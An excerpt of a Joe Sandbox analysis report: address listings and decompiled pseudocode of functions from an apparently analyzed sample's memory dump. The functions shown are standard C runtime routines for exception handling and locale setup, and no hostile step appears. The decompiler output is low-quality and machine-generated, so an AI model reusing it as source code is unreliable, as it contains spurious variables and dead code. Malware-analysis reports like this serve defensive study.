0x00416d8f
0x00416d95
0x00417109
0x00417109
0x0041710e
0x00417110
0x00417112
0x00417115
0x00417116
0x00417119
0x0041711f
0x0041723e
0x00417125
0x00417127
0x0041712e
0x00417131
0x00417134
0x0041713a
0x0041713c
0x00417141
0x00417144
0x00417146
0x0041714c
0x0041714e
0x00417154
0x00417169
0x0041716e
0x00417171
0x00417173
0x0041723a
0x00000000
0x0041723b
0x00417173
0x00417154
0x0041714c
0x00417144
0x00417179
0x0041717c
0x0041717f
0x00417182
0x00417185
0x0041718b
0x0041719d
0x004171a2
0x004171a5
0x004171a8
0x004171ab
0x004171ae
0x004171b1
0x004171b4
0x00000000
0x00000000
0x004171ba
0x004171ba
0x004171bd
0x004171c0
0x004171cf
0x004171d0
0x004171d0
0x004171d2
0x004171d5
0x00000000
0x00000000
0x004171d7
0x004171da
0x00000000
0x00000000
0x004171e8
0x004171ea
0x004171ed
0x004171ef
0x004171f7
0x004171f7
0x004171fa
0x004171fc
0x004171fe
0x0041721a
0x0041721f
0x00417222
0x00417222
0x00000000
0x004171fa
0x004171f1
0x004171f5
0x00000000
0x00000000
0x00000000
0x00417225
0x00417228
0x00417229
0x0041722c
0x0041722f
0x00417232
0x00417235
0x00417235
0x00000000
0x004171c0
0x0041723f
0x00417244
0x00417245
0x00417248
0x0041724b
0x0041724c
0x0041724d
0x0041724e
0x00417251
0x00417253
0x004172cb
0x004172cd
0x004172cd
0x00417255
0x00417255
0x00417258
0x0041725b
0x00000000
0x0041725d
0x0041725d
0x00417260
0x00417263
0x0041726a
0x0041726a
0x0041726d
0x0041726f
0x00417271
0x004172a3
0x004172a3
0x004172a6
0x004172ad
0x004172ad
0x004172b0
0x004172b3
0x004172ba
0x004172ba
0x004172bd
0x004172c4
0x004172c6
0x004172c6
0x004172bf
0x004172bf
0x004172c2
0x00000000
0x00000000
0x004172c2
0x004172b5
0x004172b5
0x004172b8
0x00000000
0x00000000
0x004172b8
0x004172a8
0x004172a8
0x004172ab
0x00000000
0x00000000
0x004172ab
0x004172c7
0x00417273
0x00417273
0x00417276
0x00417276
0x00417278
0x0041727a
0x00000000
0x00000000
0x0041727c
0x0041727e
0x00417292
0x00417292
0x00417280
0x00417280
0x00417283
0x00417286
0x00000000
0x00417288
0x00417288
0x0041728b
0x0041728e
0x00417290
0x00000000
0x00000000
0x00000000
0x00000000
0x00417290
0x00417286
0x0041729b
0x0041729b
0x0041729d
0x00000000
0x0041729f
0x0041729f
0x0041729f
0x00000000
0x0041729d
0x00417296
0x00417298
0x00417298
0x00000000
0x00417298
0x00417265
0x00417265
0x00417268
0x00000000
0x00000000
0x00000000
0x00000000
0x00417268
0x00417263
0x0041725b
0x004172ce
0x004172d2
0x004172d2
0x00416da4
0x00416da4
0x00416dad
0x00416eaa
0x00416eaa
0x00416ead
0x00000000
0x00416ddc
0x00416ddc
0x00416de1
0x00000000
0x00416de7
0x00416de7
0x00416def
0x004170a3
0x004170a7
0x00416df5
0x00416dfa
0x00416dfd
0x00416e02
0x00416e09
0x00416e0e
0x00000000
0x00416e46
0x00416e4e
0x00416eb2
0x00416eb2
0x00416eb5
0x00416eb8
0x00416eba
0x00416ebd
0x00416ec0
0x00416ec6
0x00417072
0x00417072
0x00417075
0x00000000
0x00417077
0x00417077
0x0041707a
0x00000000
0x00417080
0x00417080
0x00417083
0x00417086
0x00417087
0x00417088
0x0041708b
0x0041708c
0x0041708f
0x00417090
0x00417095
0x00000000
0x00417095
0x0041707a
0x00416ecc
0x00416ecc
0x00416ed0
0x00000000
0x00416ed6
0x00416ed6
0x00416edd
0x00416ef5
0x00416ef5
0x00416ef8
0x00416efb
0x00416f01
0x00416f11
0x00416f16
0x00416f19
0x00416f1c
0x00416f1f
0x00416f22
0x00416f25
0x00416f28
0x00416f2e
0x00416f2e
0x00416f31
0x00416f34
0x00416f43
0x00416f44
0x00416f44
0x00416f46
0x00416f49
0x00416f4f
0x00416f52
0x00416f58
0x00416f5a
0x00416f5d
0x00416f60
0x00416f66
0x00416f69
0x00416f6e
0x00416f6e
0x00416f71
0x00416f74
0x00416f77
0x00416f7a
0x00416f7d
0x00416f82
0x00416f83
0x00416f84
0x00416f85
0x00416f86
0x00416f89
0x00416f8c
0x00416f8e
0x00000000
0x00416f90
0x00416f90
0x00416f90
0x00416f91
0x00416f93
0x00416f96
0x00416f97
0x00416f9c
0x00416f9f
0x00416fa1
0x00000000
0x00000000
0x00416fa3
0x00416fa6
0x00416fa7
0x00416faa
0x00416fac
0x00000000
0x00416fae
0x00416fae
0x00416fb1
0x00000000
0x00416fb1
0x00000000
0x00416fac
0x00416fc5
0x00416fcb
0x00416fe8
0x00416fed
0x00416fed
0x00416ff0
0x00416ff0
0x00000000
0x00416fb4
0x00416fb4
0x00416fb5
0x00416fb8
0x00416fbb
0x00416fbe
0x00416fbe
0x00000000
0x00416fc3
0x00416f60
0x00416f52
0x00416ff3
0x00416ff6
0x00416ff7
0x00416ffa
0x00416ffd
0x00417000
0x00417003
0x00417003
0x0041700c
0x0041700f
0x0041700f
0x00416f28
0x00417012
0x00417016
0x00417018
0x0041701b
0x00417021
0x00417021
0x00417029
0x0041702e
0x00417098
0x00417098
0x0041709d
0x004170a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00417030
0x00417033
0x00417036
0x0041703a
0x00417048
0x0041704a
0x00417061
0x00417065
0x0041706b
0x0041706c
0x0041706e
0x00000000
0x00417070
0x00000000
0x00417070
0x00000000
0x00000000
0x00000000
0x0041703c
0x0041703c
0x0041703e
0x00000000
0x00417040
0x00417040
0x00417044
0x00000000
0x00417046
0x0041704c
0x00417051
0x00417054
0x00417059
0x0041705c
0x00000000
0x0041705c
0x00417044
0x0041703e
0x0041703a
0x00416edf
0x00416edf
0x00416ee6
0x00000000
0x00416ee8
0x00416ee8
0x00416eef
0x00000000
0x00000000
0x00000000
0x00000000
0x00416eef
0x00416ee6
0x00416edd
0x00416ed0
0x00416e50
0x00416e58
0x00416e5b
0x00416e60
0x00416e64
0x00416e67
0x00416e6d
0x00416e70
0x00000000
0x00416e72
0x00416e72
0x00416e75
0x00416e77
0x004170a8
0x004170a8
0x00000000
0x00416e7d
0x00416e85
0x00416e90
0x00000000
0x00000000
0x00416e99
0x00416e9c
0x00416e9d
0x00416ea0
0x00416ea2
0x00000000
0x00416ea8
0x00000000
0x00416ea8
0x00000000
0x00416ea2
0x00416e7d
0x004170ad
0x004170ad
0x004170af
0x004170b0
0x004170b7
0x004170ba
0x004170c8
0x004170cd
0x004170d2
0x004170d5
0x004170da
0x004170dd
0x004170e0
0x004170e2
0x004170e4
0x004170e4
0x004170e9
0x004170f5
0x004170fb
0x00417100
0x00417103
0x00417104
0x00000000
0x00417104
0x00416e70
0x00416e4e
0x00416e0e
0x00416def
0x00416de1
0x00416dad

APIs

type_info::operator==.LIBVCRUNTIME ref: 00416E89
___TypeMatch.LIBVCRUNTIME ref: 00416F97
_UnwindNestedFrames.LIBCMT ref: 004170E9
CallUnexpected.LIBVCRUNTIME ref: 00417104

Strings

csm, xrefs: 00416E14
csm, xrefs: 00416EC0
csm, xrefs: 00416DA7

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 318b65572e5b20ef664c6f281c360e51d1affc593d55bd890a21b263122f1374
Instruction ID: 455451be4c744c07c9f1c348f90df5655159583fb695b03a0c52ad18e5ab1787
Opcode Fuzzy Hash: 318b65572e5b20ef664c6f281c360e51d1affc593d55bd890a21b263122f1374
Instruction Fuzzy Hash: B9B18772904209EFCF25DFA5C8819EFBBB5BF08314B15415BE8156B302D339DA91CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004148C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004148C0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr* _t72;
				intOrPtr _t73;
				signed int _t77;
				char _t79;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr* _t94;
				void* _t98;
				void* _t100;
				void* _t107;

				_t85 = __edx;
				_t72 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t72 = E004312F7(__ecx,  *_t72);
				_t73 = _a8;
				_t6 = _t73 + 0x10; // 0x11
				_t92 = _t6;
				_push(_t92);
				_v20 = _t92;
				_v12 =  *(_t73 + 8) ^  *0x443048;
				E00414880(_t73, __edx, __edi, _t92,  *(_t73 + 8) ^  *0x443048);
				E0041789C(_a12);
				_t52 = _a4;
				_t100 = _t98 - 0x1c + 0x10;
				_t89 =  *((intOrPtr*)(_t73 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t89 - 0xfffffffe;
					if(_t89 != 0xfffffffe) {
						_t85 = 0xfffffffe;
						E00417A20(_t73, 0xfffffffe, _t92, 0x443048);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
					if(_t89 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t77 = _v12;
							_t59 = _t89 + (_t89 + 2) * 2;
							_t73 =  *((intOrPtr*)(_t77 + _t59 * 4));
							_t60 = _t77 + _t59 * 4;
							_t78 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t79 = _v5;
								goto L7;
							} else {
								_t85 = _t92;
								_t61 = E004179C0(_t78, _t92);
								_t79 = 1;
								_v5 = 1;
								_t107 = _t61;
								if(_t107 < 0) {
									_v16 = 0;
									L13:
									_push(_t92);
									E00414880(_t73, _t85, _t89, _t92, _v12);
									goto L14;
								} else {
									if(_t107 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x4346b0;
											if(__eflags != 0) {
												_t68 = E00430D10(__eflags, 0x4346b0);
												_t100 = _t100 + 4;
												__eflags = _t68;
												if(_t68 != 0) {
													_t94 =  *0x4346b0; // 0x4146b3
													 *0x4331a4(_a4, 1);
													 *_t94();
													_t92 = _v20;
													_t100 = _t100 + 8;
												}
												_t62 = _a4;
											}
										}
										_t86 = _t62;
										E00417A00(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t89;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t89) {
											_t86 = _t89;
											E00417A20(_t64, _t89, _t92, 0x443048);
											_t64 = _a8;
										}
										_push(_t92);
										 *((intOrPtr*)(_t64 + 0xc)) = _t73;
										E00414880(_t73, _t86, _t89, _t92, _v12);
										E004179E0();
										asm("int3");
										_t66 =  *0x4447d0; // 0x0
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L24;
							L7:
							_t89 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t79 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L24:
			}

0x004148c0
0x004148c7
0x004148cb
0x004148cc
0x004148d2
0x004148de
0x004148e0
0x004148e6
0x004148e6
0x004148ef
0x004148f1
0x004148f4
0x004148f7
0x004148ff
0x00414904
0x00414907
0x0041490a
0x00414911
0x0041496d
0x00414970
0x00414978
0x0041497f
0x00000000
0x0041497f
0x00000000
0x00414913
0x00414913
0x00414919
0x0041491f
0x00414925
0x00414990
0x00414999
0x00414927
0x00414927
0x00414927
0x0041492d
0x00414930
0x00414933
0x00414936
0x00414939
0x0041493e
0x00414954
0x00000000
0x00414940
0x00414940
0x00414942
0x00414947
0x00414949
0x0041494c
0x0041494e
0x00414964
0x00414984
0x00414984
0x00414988
0x00000000
0x00414950
0x00414950
0x0041499a
0x0041499d
0x004149a3
0x004149a5
0x004149ac
0x004149b3
0x004149b8
0x004149bb
0x004149bd
0x004149bf
0x004149cc
0x004149d2
0x004149d4
0x004149d7
0x004149d7
0x004149da
0x004149da
0x004149ac
0x004149e0
0x004149e2
0x004149e7
0x004149ea
0x004149ed
0x004149f5
0x004149f9
0x004149fe
0x004149fe
0x00414a01
0x00414a05
0x00414a08
0x00414a18
0x00414a1d
0x00414a1e
0x00414a24
0x00414952
0x00000000
0x00414952
0x00414950
0x0041494e
0x00000000
0x00414957
0x00414957
0x00414959
0x00414960
0x00000000
0x00414962
0x00000000
0x00414960
0x00414925
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 004148F7
___except_validate_context_record.LIBVCRUNTIME ref: 004148FF
_ValidateLocalCookies.LIBCMT ref: 00414988
__IsNonwritableInCurrentImage.LIBCMT ref: 004149B3
_ValidateLocalCookies.LIBCMT ref: 00414A08

Strings

csm, xrefs: 0041499D
0'@, xrefs: 004149CC

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: 0'@$csm
API String ID: 1170836740-4075550888
Opcode ID: 37ee35bdfcf69a5a67e8760e9b0949c12f64935090aec567b214218e131f2c08
Instruction ID: 58811f3bd87834736161466f5a39b72313ca76df223ce2887cb75226c9d9a6a3
Opcode Fuzzy Hash: 37ee35bdfcf69a5a67e8760e9b0949c12f64935090aec567b214218e131f2c08
Instruction Fuzzy Hash: 3F411974A102099BCF10DF69C841ADFBFB5AF85328F14816BE8145B352D739EA85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBE0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040BBE0(void* __ebx, intOrPtr __edx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				short _v40;
				signed int _v44;
				short _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				char _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				char _v100;
				signed int _v116;
				void* __esi;
				void* __ebp;
				signed int _t57;
				signed int _t68;
				intOrPtr _t87;
				intOrPtr* _t99;
				signed int* _t103;
				signed int _t106;
				intOrPtr _t108;
				void* _t109;
				signed int _t111;
				intOrPtr* _t114;
				intOrPtr _t117;
				intOrPtr* _t119;
				signed int* _t120;
				signed int _t122;
				signed int _t125;
				signed int _t129;
				void* _t130;
				void* _t132;

				_t110 = __edx;
				_t125 = _t129;
				_push(0xffffffff);
				_push(0x4322c5);
				_push( *[fs:0x0]);
				_t130 = _t129 - 0x54;
				_push(__ebx);
				_push(__edi);
				_t57 =  *0x443048; // 0x35200185
				_push(_t57 ^ _t125);
				 *[fs:0x0] =  &_v16;
				_t114 = _a4;
				_t117 = _a8;
				_v20 = 0;
				if(_t114 == 0) {
					L21:
					 *[fs:0x0] = _v16;
					return 1;
				} else {
					_t138 =  *_t114;
					if( *_t114 != 0) {
						goto L21;
					} else {
						_t99 = E0041362C(__ebx, _t114, _t117, _t138, 0x10);
						_t132 = _t130 + 4;
						_v76 = _t99;
						_v8 = 0;
						_t119 = E00409760(_t99, _t117, _t114,  &_v100);
						_v20 = 1;
						if( *((intOrPtr*)(_t119 + 0x14)) >= 0x10) {
							_t119 =  *_t119;
						}
						_t103 =  &_v72;
						E0041247D(_t103, 0);
						_v8 = 2;
						_v68 = 0;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v8 = 8;
						_t140 = _t119;
						if(_t119 == 0) {
							E00412430("bad locale name");
							goto L23;
						} else {
							E00412760(_t103,  &_v72, _t119);
							 *(_t99 + 4) = 0;
							 *_t99 = 0x4345e8;
							 *((intOrPtr*)(_t99 + 8)) = E00412DDA(_t99, _t114, _t140);
							 *((intOrPtr*)(_t99 + 0xc)) = _t110;
							 *_t114 = _t99;
							_v20 = 1;
							_v8 = 0xa;
							E004127AB(_t103,  &_v72);
							_t80 = _v28;
							_t132 = _t132 + 0xc;
							if(_v28 != 0) {
								E0041AC1E(_t80);
								_t132 = _t132 + 4;
							}
							_t81 = _v36;
							_v28 = 0;
							if(_v36 != 0) {
								E0041AC1E(_t81);
								_t132 = _t132 + 4;
							}
							_t82 = _v44;
							_v36 = 0;
							if(_v44 != 0) {
								E0041AC1E(_t82);
								_t132 = _t132 + 4;
							}
							_t83 = _v52;
							_v44 = 0;
							if(_v52 != 0) {
								E0041AC1E(_t83);
								_t132 = _t132 + 4;
							}
							_t84 = _v60;
							_v52 = 0;
							if(_v60 != 0) {
								E0041AC1E(_t84);
								_t132 = _t132 + 4;
							}
							_t85 = _v68;
							_v60 = 0;
							if(_v68 != 0) {
								E0041AC1E(_t85);
								_t132 = _t132 + 4;
							}
							_v68 = 0;
							E004124D5( &_v72);
							_t108 = _v80;
							if(_t108 < 0x10) {
								goto L21;
							} else {
								_t112 = _v100;
								_t109 = _t108 + 1;
								_t87 = _v100;
								if(_t109 < 0x1000) {
									L20:
									_push(_t109);
									E004138AD(_t112);
									goto L21;
								} else {
									_t110 =  *((intOrPtr*)(_t87 - 4));
									_t103 = _t109 + 0x23;
									if(_t87 -  *((intOrPtr*)(_t87 - 4)) + 0xfffffffc > 0x1f) {
										L23:
										E0041805F(_t99, _t103, _t110);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t119);
										_t120 = _t103;
										_t68 =  *_t120;
										__eflags = _t68;
										if(_t68 == 0) {
											L29:
											return _t68;
										} else {
											_t106 = _t120[2] - _t68 & 0xfffffffc;
											__eflags = _t106 - 0x1000;
											if(_t106 < 0x1000) {
												L28:
												_push(_t106);
												_t68 = E004138AD(_t68);
												 *_t120 = 0;
												_t120[1] = 0;
												_t120[2] = 0;
												goto L29;
											} else {
												_t111 =  *(_t68 - 4);
												_t106 = _t106 + 0x23;
												__eflags = _t68 - _t111 + 0xfffffffc - 0x1f;
												if(_t68 - _t111 + 0xfffffffc > 0x1f) {
													E0041805F(_t99, _t106, _t111);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t125);
													_push(_t120);
													_t122 = _t106;
													 *_t122 = 0x4345e8;
													E0041AC1E( *((intOrPtr*)(_t122 + 0xc)));
													 *_t122 = 0x4337e4;
													__eflags = _v116 & 0x00000001;
													if((_v116 & 0x00000001) != 0) {
														_push(0x10);
														E004138AD(_t122);
													}
													return _t122;
												} else {
													_t68 = _t111;
													goto L28;
												}
											}
										}
									} else {
										goto L20;
									}
								}
							}
						}
					}
				}
			}

0x0040bbe0
0x0040bbe1
0x0040bbe3
0x0040bbe5
0x0040bbf0
0x0040bbf1
0x0040bbf4
0x0040bbf6
0x0040bbf7
0x0040bbfe
0x0040bc02
0x0040bc08
0x0040bc0b
0x0040bc0e
0x0040bc17
0x0040bdab
0x0040bdb3
0x0040bdc1
0x0040bc1d
0x0040bc1d
0x0040bc20
0x00000000
0x0040bc26
0x0040bc2d
0x0040bc2f
0x0040bc32
0x0040bc38
0x0040bc47
0x0040bc4d
0x0040bc54
0x0040bc56
0x0040bc56
0x0040bc5a
0x0040bc5d
0x0040bc62
0x0040bc69
0x0040bc70
0x0040bc74
0x0040bc7b
0x0040bc81
0x0040bc88
0x0040bc8c
0x0040bc8f
0x0040bc93
0x0040bc96
0x0040bc99
0x0040bc9c
0x0040bc9f
0x0040bca3
0x0040bca5
0x0040bdc7
0x00000000
0x0040bcab
0x0040bcb0
0x0040bcb5
0x0040bcbc
0x0040bcc7
0x0040bcca
0x0040bccd
0x0040bccf
0x0040bcd9
0x0040bce1
0x0040bce6
0x0040bce9
0x0040bcee
0x0040bcf1
0x0040bcf6
0x0040bcf6
0x0040bcf9
0x0040bcfc
0x0040bd05
0x0040bd08
0x0040bd0d
0x0040bd0d
0x0040bd10
0x0040bd13
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd24
0x0040bd27
0x0040bd2a
0x0040bd33
0x0040bd36
0x0040bd3b
0x0040bd3b
0x0040bd3e
0x0040bd41
0x0040bd4a
0x0040bd4d
0x0040bd52
0x0040bd52
0x0040bd55
0x0040bd58
0x0040bd61
0x0040bd64
0x0040bd69
0x0040bd69
0x0040bd6f
0x0040bd76
0x0040bd7b
0x0040bd81
0x00000000
0x0040bd83
0x0040bd83
0x0040bd86
0x0040bd87
0x0040bd8f
0x0040bda1
0x0040bda1
0x0040bda3
0x00000000
0x0040bd91
0x0040bd91
0x0040bd94
0x0040bd9f
0x0040bdcc
0x0040bdcc
0x0040bdd1
0x0040bdd2
0x0040bdd3
0x0040bdd4
0x0040bdd5
0x0040bdd6
0x0040bdd7
0x0040bdd8
0x0040bdd9
0x0040bdda
0x0040bddb
0x0040bddc
0x0040bddd
0x0040bdde
0x0040bddf
0x0040bde0
0x0040bde1
0x0040bde3
0x0040bde5
0x0040bde7
0x0040be29
0x0040be2a
0x0040bde9
0x0040bdee
0x0040bdf1
0x0040bdf7
0x0040be0b
0x0040be0b
0x0040be0d
0x0040be12
0x0040be1b
0x0040be22
0x00000000
0x0040bdf9
0x0040bdf9
0x0040bdfc
0x0040be04
0x0040be07
0x0040be2b
0x0040be30
0x0040be31
0x0040be32
0x0040be33
0x0040be34
0x0040be35
0x0040be36
0x0040be37
0x0040be38
0x0040be39
0x0040be3a
0x0040be3b
0x0040be3c
0x0040be3d
0x0040be3e
0x0040be3f
0x0040be40
0x0040be43
0x0040be44
0x0040be49
0x0040be4f
0x0040be57
0x0040be5d
0x0040be61
0x0040be63
0x0040be66
0x0040be6b
0x0040be72
0x0040be09
0x0040be09
0x00000000
0x0040be09
0x0040be07
0x0040bdf7
0x00000000
0x00000000
0x00000000
0x0040bd9f
0x0040bd8f
0x0040bd81
0x0040bca5
0x0040bc20

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040BC5D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BCB0
__Getcoll.LIBCPMT ref: 0040BCC2
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040BCE1
std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD76

Strings

bad locale name, xrefs: 0040BDC2

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1629477862-1405518554
Opcode ID: 44ab8008e035c0ac2b3f91d3b9bc5baf5803db0be0de800143d3f33e59eeaf2b
Instruction ID: 97fe08cfb2a8f7b7a91d7429fb5f2b0e82c167ee0af6e40b762417834b2648ba
Opcode Fuzzy Hash: 44ab8008e035c0ac2b3f91d3b9bc5baf5803db0be0de800143d3f33e59eeaf2b
Instruction Fuzzy Hash: C7618DB19012089BEB10DFA5D9497DEFBB4EF04314F14452EE905E7381E7BC9A84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B260 Relevance: 10.6, APIs: 7, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040B260(void* __ebx, signed int* __ecx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _v44;
				signed int* _v48;
				void* __edi;
				signed int _t42;
				signed int _t43;
				signed int* _t46;
				signed int _t48;
				void* _t54;
				signed int _t55;
				signed int* _t56;
				void* _t61;
				signed int _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				void* _t72;
				signed int* _t75;
				signed int _t82;
				void* _t86;
				void* _t87;
				signed int _t88;
				signed int* _t89;
				void* _t90;
				signed int* _t91;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t102;
				void* _t104;
				void* _t107;
				void* _t110;

				_t86 = __edx;
				_t100 = _t102;
				_push(0xffffffff);
				_push(0x4320f0);
				_push( *[fs:0x0]);
				_t42 =  *0x443048; // 0x35200185
				_t43 = _t42 ^ _t102;
				_v20 = _t43;
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(_t43);
				 *[fs:0x0] =  &_v16;
				_t45 = __ecx;
				_v44 = __ecx;
				_v28 = __ecx;
				_t5 = _t45 + 8; // 0x8
				_t69 = _t5;
				_v48 = __ecx;
				_v36 = _t69;
				_push(1);
				_v8 = 0;
				_t46 = E00412660(_t69, _t87, __esi, __eflags);
				_t104 = _t102 - 0x20 + 4;
				 *(_t69 + 4) = _t46;
				_v8 = 1;
				E0041247D( &_v28, 0);
				_v8 = 2;
				_t48 =  *0x444f58; // 0x0
				_t88 =  *0x444fd4; // 0x0
				_v24 = _t48;
				_v40 = _t48;
				if(_t88 == 0) {
					E0041247D( &_v32, _t88);
					_t110 =  *0x444fd4 - _t88; // 0x0
					if(_t110 == 0) {
						_t66 =  *0x444310; // 0x2
						_t67 = _t66 + 1;
						 *0x444310 = _t67;
						 *0x444fd4 = _t67;
					}
					E004124D5( &_v32);
					_t88 =  *0x444fd4; // 0x0
				}
				_t75 =  *(_t69 + 4);
				_t70 = _t88 * 4;
				if(_t88 >= _t75[3]) {
					_t95 = 0;
					__eflags = 0;
					goto L9;
				} else {
					_t95 =  *(_t70 + _t75[2]);
					if(_t95 == 0) {
						L9:
						__eflags = _t75[5];
						if(_t75[5] == 0) {
							L12:
							__eflags = _t95;
							if(_t95 != 0) {
								goto L6;
							} else {
								goto L13;
							}
						} else {
							_t61 = E0041265A();
							__eflags = _t88 -  *((intOrPtr*)(_t61 + 0xc));
							if(_t88 >=  *((intOrPtr*)(_t61 + 0xc))) {
								L13:
								_t95 = _v24;
								_t71 = _v36;
								__eflags = _t95;
								if(_t95 != 0) {
									goto L7;
								} else {
									_push(_t71);
									_t54 = E0040BBE0(_t71, _t86, _t88,  &_v40);
									_t107 = _t104 + 8;
									__eflags = _t54 - 0xffffffff;
									if(__eflags == 0) {
										_t55 = E00403390();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t88);
										_t91 = _t75;
										__eflags =  *_t91;
										if( *_t91 == 0) {
											L23:
											 *_t91 = 0;
											return _t55;
										} else {
											_t55 = _t55 | 0xffffffff;
											__eflags = _t55;
											asm("lock xadd [ecx+0x20], eax");
											if(_t55 != 0) {
												goto L23;
											} else {
												_push(_t95);
												_t97 =  *_t91;
												__eflags = _t97;
												if(_t97 != 0) {
													asm("o16 nop [eax+eax]");
													do {
														_t82 = _t97;
														_t56 = _t97 + 0xc;
														_t97 =  *_t56;
														 *_t56 = 0;
														_t55 =  *((intOrPtr*)( *_t82))(1);
														__eflags = _t97;
													} while (_t97 != 0);
												}
												 *_t91 = 0;
												return _t55;
											}
										}
									} else {
										_t95 = _v40;
										_v24 = _t95;
										_v8 = 3;
										E0041262E(__eflags, _t95);
										_t104 = _t107 + 4;
										 *((intOrPtr*)( *_t95 + 4))();
										 *0x444f58 = _t95;
										goto L7;
									}
								}
							} else {
								_t95 =  *(_t70 +  *((intOrPtr*)(_t61 + 8)));
								goto L12;
							}
						}
					} else {
						L6:
						_t71 = _v36;
						L7:
						_v8 = 1;
						E004124D5( &_v28);
						_t89 = _v44;
						 *_t89 = _t95;
						_t89[1] = E00408230(_t71, _t71);
						 *[fs:0x0] = _v16;
						_pop(_t90);
						_pop(_t96);
						_pop(_t72);
						return E0041361E(_t89, _t72, _v20 ^ _t100, _t86, _t90, _t96);
					}
				}
			}

0x0040b260
0x0040b261
0x0040b263
0x0040b265
0x0040b270
0x0040b274
0x0040b279
0x0040b27b
0x0040b27e
0x0040b27f
0x0040b280
0x0040b281
0x0040b285
0x0040b28b
0x0040b28d
0x0040b290
0x0040b293
0x0040b293
0x0040b296
0x0040b299
0x0040b29c
0x0040b29e
0x0040b2a5
0x0040b2aa
0x0040b2ad
0x0040b2b5
0x0040b2bc
0x0040b2c1
0x0040b2c5
0x0040b2ca
0x0040b2d0
0x0040b2d3
0x0040b2d8
0x0040b2de
0x0040b2e3
0x0040b2e9
0x0040b2eb
0x0040b2f0
0x0040b2f1
0x0040b2f6
0x0040b2f6
0x0040b2fe
0x0040b303
0x0040b303
0x0040b309
0x0040b30c
0x0040b316
0x0040b360
0x0040b360
0x00000000
0x0040b318
